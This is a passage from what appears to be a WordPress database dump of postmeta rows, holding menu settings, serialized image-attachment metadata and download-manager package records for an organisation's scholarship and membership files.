(3742,949,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3743,949,'_menu_item_xfn',''),(3744,949,'_menu_item_url',''),(3755,951,'_menu_item_type','post_type'),(3756,951,'_menu_item_menu_item_parent','1287'),(3757,951,'_menu_item_object_id','247'),(3758,951,'_menu_item_object','page'),(3759,951,'_menu_item_target',''),(3760,951,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3761,951,'_menu_item_xfn',''),(3762,951,'_menu_item_url',''),(3796,956,'_thumbnail_id','676'),(3764,952,'_menu_item_type','post_type'),(3765,952,'_menu_item_menu_item_parent','0'),(3766,952,'_menu_item_object_id','6'),(3767,952,'_menu_item_object','page'),(3768,952,'_menu_item_target',''),(3769,952,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3770,952,'_menu_item_xfn',''),(3771,952,'_menu_item_url',''),(5180,1309,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5177,1309,'day','1541030400'),(5168,1298,'post_settings',NULL),(5169,1298,'ts_article_views','86'),(5170,1298,'_yoast_wpseo_focuskw','College Application'),(5076,1294,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:650;s:4:\"file\";s:24:\"2018/09/NewSizeAward.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"NewSizeAward-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"NewSizeAward-300x102.png\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"NewSizeAward-768x260.png\";s:5:\"width\";i:768;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"NewSizeAward-1024x347.png\";s:5:\"width\";i:1024;s:6:\"height\";i:347;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"NewSizeAward-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"NewSizeAward-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"NewSizeAward-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"NewSizeAward-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3835,960,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:15:\"2014/12/MOD.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"MOD-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:15:\"MOD-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:15:\"MOD-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:15:\"MOD-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3834,960,'_wp_attached_file','2014/12/MOD.png'),(3836,961,'_wp_attached_file','2014/12/NAACP.png'),(3837,961,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:17:\"2014/12/NAACP.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"NAACP-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:17:\"NAACP-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:17:\"NAACP-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"NAACP-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3838,962,'_wp_attached_file','2014/12/AACR-1.png'),(3839,962,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2014/12/AACR-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"AACR-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:18:\"AACR-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:18:\"AACR-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"AACR-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3840,963,'_wp_attached_file','2014/12/mcvet.png'),(3841,963,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:17:\"2014/12/mcvet.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"mcvet-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:17:\"mcvet-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:17:\"mcvet-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"mcvet-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3842,781,'_yoast_wpseo_content_score','30'),(3843,964,'_wp_attached_file','2017/01/FINAL2017APPAPartnership-2.pdf'),(3844,964,'_wp_attachment_metadata','a:1:{s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"FINAL2017APPAPartnership-2-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"FINAL2017APPAPartnership-2-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"FINAL2017APPAPartnership-2-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"full\";a:4:{s:4:\"file\";s:30:\"FINAL2017APPAPartnership-2.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";}}}'),(3845,964,'_edit_lock','1484580893:1'),(3852,967,'_wp_attached_file','2017/01/ScholarshipPic.jpg'),(3853,967,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2017/01/ScholarshipPic.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"ScholarshipPic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"ScholarshipPic-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"ScholarshipPic-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"ScholarshipPic-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:26:\"ScholarshipPic-640x300.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"ScholarshipPic-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3854,968,'_wp_attached_file','2017/01/ScholarshipPic3.jpg'),(3855,968,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:680;s:4:\"file\";s:27:\"2017/01/ScholarshipPic3.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic3-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic3-768x544.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:544;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic3-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic3-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic3-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic3-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3856,969,'_wp_attached_file','2014/12/YearofService.png'),(3857,969,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:555;s:4:\"file\";s:25:\"2014/12/YearofService.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"YearofService-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"YearofService-270x300.png\";s:5:\"width\";i:270;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"YearofService-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"YearofService-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"YearofService-500x300.png\";s:5:\"width\";i:500;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"YearofService-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3858,970,'_wp_attached_file','2017/01/footsteps2017.jpg'),(3859,970,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:851;s:6:\"height\";i:314;s:4:\"file\";s:25:\"2017/01/footsteps2017.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"footsteps2017-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"footsteps2017-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"footsteps2017-768x283.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"footsteps2017-400x314.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:314;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"footsteps2017-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"footsteps2017-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"footsteps2017-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3860,567,'_yoast_wpseo_content_score','30'),(3861,971,'_wp_attached_file','2014/12/905736873100616160117.png'),(3862,971,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:111;s:6:\"height\";i:23;s:4:\"file\";s:33:\"2014/12/905736873100616160117.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3876,976,'_wp_attached_file','2014/12/We-Want-You-Back.png'),(3877,976,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:400;s:4:\"file\";s:28:\"2014/12/We-Want-You-Back.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"We-Want-You-Back-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"We-Want-You-Back-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"We-Want-You-Back-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:28:\"We-Want-You-Back-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:28:\"We-Want-You-Back-500x300.png\";s:5:\"width\";i:500;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"We-Want-You-Back-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3869,973,'_wp_attached_file','2014/12/MembershipKey.png'),(3870,973,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:339;s:6:\"height\";i:209;s:4:\"file\";s:25:\"2014/12/MembershipKey.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"MembershipKey-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"MembershipKey-300x185.png\";s:5:\"width\";i:300;s:6:\"height\";i:185;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"MembershipKey-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3873,968,'_edit_lock','1484586126:1'),(3874,975,'_wp_attached_file','2014/12/Centennial.jpg'),(3875,975,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:294;s:6:\"height\";i:250;s:4:\"file\";s:22:\"2014/12/Centennial.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Centennial-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"Centennial-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5199,1313,'post_settings',NULL),(5198,1313,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(4453,1182,'_wp_attached_file','2014/12/c1.png'),(4454,1182,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:14:\"2014/12/c1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"c1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"c1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:14:\"c1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:14:\"c1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:14:\"c1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3933,989,'_edit_last','1'),(3932,989,'_edit_lock','1484681555:1'),(3934,989,'ts_template','a:0:{}'),(3935,989,'__wpdm_files','a:1:{i:0;s:33:\"Member in Good Standing_21716.pdf\";}'),(3936,989,'__wpdm_version',''),(3937,989,'__wpdm_link_label',''),(3938,989,'__wpdm_package_size','360.84 KB'),(3939,989,'__wpdm_quota',''),(3940,989,'__wpdm_view_count','57'),(3941,989,'__wpdm_download_count','16'),(3942,989,'__wpdm_access','a:1:{i:0;s:5:\"guest\";}'),(3943,989,'__wpdm_password',''),(3944,989,'__wpdm_icon',''),(3945,989,'__wpdm_masterkey','587e719274611'),(3946,989,'_yoast_wpseo_primary_wpdmcategory','59'),(3947,989,'_yoast_wpseo_content_score','30'),(3948,991,'_edit_lock','1484682075:1'),(3949,991,'_edit_last','1'),(3950,991,'ts_template','a:0:{}'),(3951,991,'__wpdm_files','a:1:{i:0;s:49:\"1484682001wpdm_AACR Committe Report - 111916.docx\";}'),(3952,991,'__wpdm_version',''),(3953,991,'__wpdm_link_label',''),(3954,991,'__wpdm_package_size','88.91 KB'),(3955,991,'__wpdm_quota',''),(3956,991,'__wpdm_view_count','12'),(3957,991,'__wpdm_download_count',''),(3958,991,'__wpdm_access','a:2:{i:0;s:10:\"subscriber\";i:1;s:13:\"administrator\";}'),(3959,991,'__wpdm_password',''),(3960,991,'__wpdm_icon',''),(3962,991,'_yoast_wpseo_primary_wpdmcategory','61'),(3963,991,'_yoast_wpseo_content_score','30'),(3964,991,'__wpdm_masterkey','587e739e13362'),(3965,989,'__wpdm_package_size_b','369501'),(3966,989,'ts_article_views','324'),(3969,991,'ts_article_views','200'),(3971,994,'_wp_attached_file','2017/01/Kathy-Ball.jpg'),(3972,994,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:597;s:6:\"height\";i:737;s:4:\"file\";s:22:\"2017/01/Kathy-Ball.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Kathy-Ball-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Kathy-Ball-243x300.jpg\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Kathy-Ball-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"Kathy-Ball-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"Kathy-Ball-597x300.jpg\";s:5:\"width\";i:597;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"Kathy-Ball-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3975,996,'_wp_attached_file','2017/01/Angela-Jefferson.jpg'),(3976,996,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1884;s:6:\"height\";i:2654;s:4:\"file\"